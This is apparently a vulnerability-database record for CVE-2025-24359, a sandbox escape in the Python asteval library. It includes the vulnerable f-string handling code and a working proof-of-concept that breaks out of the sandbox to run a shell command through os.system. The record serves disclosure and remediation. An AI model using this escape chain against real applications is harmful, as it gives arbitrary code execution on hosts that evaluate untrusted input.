{"id":"CVE-2025-24359","aliases":["GHSA-3wwr-3g9f-9gc7","PYSEC-2026-1195"],"title":"ASTEVAL Allows Maliciously Crafted Format Strings to Lead to Sandbox Escape","summary":"ASTEVAL Allows Maliciously Crafted Format Strings to Lead to Sandbox Escape","severity":"high","cvss":8.4,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","vendor":"asteval","product":"asteval","ecosystem":"pip","affected":["asteval < 1.0.6"],"patched":["asteval 1.0.6"],"published":"2025-01-24","updated":"2026-07-07","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-3wwr-3g9f-9gc7","references":[{"url":"https://github.com/lmfit/asteval/security/advisories/GHSA-3wwr-3g9f-9gc7"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-24359"},{"url":"https://github.com/lmfit/asteval/commit/45bb47533f7abb5479618ae7f6a809215700dcb2"},{"url":"https://github.com/lmfit/asteval"},{"url":"https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507"},{"url":"https://lucumr.pocoo.org/2016/12/29/careful-with-str-format"}],"tags":["osv","pip"],"epss":0.00272,"epssPercentile":0.198,"ingestedAt":"2026-07-08T18:25:45.198Z","slug":"CVE-2025-24359","body":"## Overview\n\n### Summary\nIf an attacker can control the input to the `asteval` library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library.\n\n### Details\nThe vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the [`on_formattedvalue`](https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507) value uses the [dangerous format method of the str class](https://lucumr.pocoo.org/2016/12/29/careful-with-str-format/), as shown in the vulnerable code snippet below:\n\n```py\n    def on_formattedvalue(self, node): # ('value', 'conversion', 'format_spec')\n        \"formatting used in f-strings\"\n        val = self.run(node.value)\n        fstring_converters = {115: str, 114: repr, 97: ascii}\n        if node.conversion in fstring_converters:\n            val = fstring_converters[node.conversion](val)\n        fmt = '{__fstring__}'\n        if node.format_spec is not None:\n            fmt = f'{{__fstring__:{self.run(node.format_spec)}}}'\n        return fmt.format(__fstring__=val)\n```\n\nThe code above allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties.\n\n### PoC\nThe following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the `whoami` command on the host machine:\n\n```py\nfrom asteval import Interpreter\naeval = Interpreter()\ncode = \"\"\"\n# def lender():\n#     ga\n    \ndef pwn():\n    try:\n        f\"{dict.mro()[1]:'\\\\x7B__fstring__.__getattribute__.s\\\\x7D'}\"\n    except Exception as ga:\n        ga = ga.obj\n        sub = ga(dict.mro()[1],\"__subclasses__\")()\n        importer = None\n        for i in sub:\n            if \"BuiltinImporter\" in str(i):\n                importer = i.load_module\n                break\n        os = importer(\"os\")\n        os.system(\"whoami\")\n\n# pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below\n# pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works\n        \npwn()\n\"\"\"\naeval(code)\n\n```\n\n## Affected packages\n\n- `asteval < 1.0.6`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `asteval 1.0.6`","depth":"twilight","depthScore":46,"depthScoreParts":{"impact":46.2,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}